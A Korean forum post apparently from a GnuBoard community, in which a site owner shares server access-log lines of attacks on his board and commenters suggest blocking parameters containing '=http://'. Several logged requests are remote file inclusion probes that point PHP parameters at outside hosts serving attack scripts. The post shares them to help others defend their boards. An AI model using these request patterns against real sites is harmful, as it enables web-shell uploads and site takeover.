SIR

사이트 로그로 알아본 해커들 공격 유형

아갈갤러리
프로필 보기이 회원 글보기이 회원의 댓글보기
 · 14년 전 · 6485 · 3

트래픽 로그 + 스킨게시판 에러 로그로 조사해봣습니다.
어디서 뻥뻥 뚫려 웹셀이 업로드 된지는 확실히 못알아냈는데..
(로그가 하루에 1GB가 쌓여서 거의 분석이 불가능할 지경..)

그누보드 보안에 혹시나 참고가 될까 해서 올려봅니다. (중복 로그 제외)

205.209.97.120 - - [18/Mar/2011:12:05:00 +0900] "GET ///delete_all.php?board_skin_path=http://www.housevampyr.com/depot/catalog/images/hewlett_packard/id.txt

67.192.170.65 - - [18/Mar/2011:11:44:47 +0900] "GET /main/bbs//delete_comment.php?board_skin_path=http://www.genednetwork.or.th/introduce//pic_files/id1.txt? HTTP/1.1" 200 25

74.50.5.221 - - [18/Mar/2011:13:53:15 +0900] "GET ///?_SERVER[DOCUMENT_ROOT]=http://smash2.fileave.com/zfxid1.txt???

74.50.5.221 - - [18/Mar/2011:14:03:31 +0900] "GET /main/counter.php///?_zb_path=http://smash2.fileave.com/zfxid1.txt??? HTTP/1.1" 200 144

67.192.170.65 - - [18/Mar/2011:23:21:51 +0900] "GET /main/bbs///skin/happycast_category_lightblack/login.php?dir=http://www.genednetwork.or.th/introduce//pic_files/id1.txt? HTTP/1.1" 404 313

143.248.72.202 - - [18/Mar/2011:23:33:11 +0900] "GET /main/bbs//skin/ggambo5100_board/setup.php?setup[use_category]=1&dir=http://www.genednetwork.or.th/introduce//pic_files/id1.txt? HTTP/1.1" 404 299

query 110313 122156 guest 94.136.63.119  /main//index.php?united=http://www.genednetwork.or.th/introduce//pic_files/id1.txt

query 110314 035424 guest 66.249.67.135  /main/bbs/board.php?bo_table=politic&sca=占쎄퀣占쏙옙>
++++++++
++++++++++++?쒕ぉ
++++++++++++?댁슜
++++++++++++?쒕ぉ+?댁슜
++++++++++++++++++++++++?뚯썝?꾩씠??/option>
++++++++++++?뚯썝?꾩씠??肄?
++++++++++++?대쫫
++++++++++++?대쫫(肄?
++++++++++++++++++++
++++++++
++++++++
++++++++++++?쒕ぉ
++++++++++++?댁슜
++++++++++++?쒕ぉ+?댁슜
++++++++++++++++++++++++?뚯썝?꾩씠??/option>
++++++++++++?뚯썝?꾩씠??肄?
++++++++++++?대쫫
++++++++++++?대쫫(肄?
++++++++++++++++++++
++++++++
query 110314 070317 guest 91.201.66.154  
/main/bbs/board.php?bo_table=factory&wr_id=19&sfl=&stx=&sst=wr_hit&sod=desc&sop=and&page=1++GET+http://agal.co.kr/main/bbs/board.php?bo_table=factory&wr_id=19&sfl=&stx=&sst=wr_hit&sod=desc&sop=and&page=1+[0,80162,119458]+-> bo_table=factory&wr_id=19&sfl=&stx=&sst=wr_hit&sod=desc&sop=and&page=1++GET+http://agal.co.kr/main/bbs/board.php?bo_table=factory&wr_id=19&sfl=&stx=&sst=wr_hit&sod=desc&sop=and&page=1+[0,80162,119458]+->


|
글쓰기

댓글 3개

아갈갤러리
프로필 보기이 회원 글보기이 회원의 댓글보기
 14년 전
아참 access.log1 과 access.log2 참고..
error.log는 아직 열어보지도 못햇네요.
로빈아빠
프로필 보기이 회원 글보기이 회원의 댓글보기
 14년 전
=http:// 로 들어오는 모든 접근은 막으시면 되구요. sca 로 들어오는것은 검색어 조회수를 올리기 위한 접근입니다. 제가 올린 해킹관련 extend 파일을 넣어두시면 관련 부분은 우선 차단됩니다.
亞波治
프로필 보기이 회원 글보기이 회원의 댓글보기
 14년 전
아~ 저도 서버 로그 분석 해 봐야 하는데.....ㅠㅠ
이전글목록다음글
댓글을 작성하시려면 로그인이 필요합니다. 로그인

자유게시판

+
제목 글쓴이 날짜 조회
14년 전 조회 4,088
14년 전 조회 2,374
14년 전 조회 1,893
14년 전 조회 2,493
14년 전 조회 2,958
14년 전 조회 1,355
14년 전 조회 1,747
14년 전 조회 1,806
14년 전 조회 3,408
14년 전 조회 2,474
14년 전 조회 2,100
14년 전 조회 2,221
14년 전 조회 1,722
14년 전 조회 1,547
14년 전 조회 6,486
14년 전 조회 2,278
14년 전 조회 2,119
14년 전 조회 4,111
14년 전 조회 2,794
14년 전 조회 3,004
14년 전 조회 2,602
14년 전 조회 2,037
14년 전 조회 1,699
14년 전 조회 1,784
14년 전 조회 2,806
14년 전 조회 9,159
14년 전 조회 3,028
14년 전 조회 1,780
14년 전 조회 2,020
14년 전 조회 1,705
이전 첫 페이지 다음
글쓰기
🐛 버그신고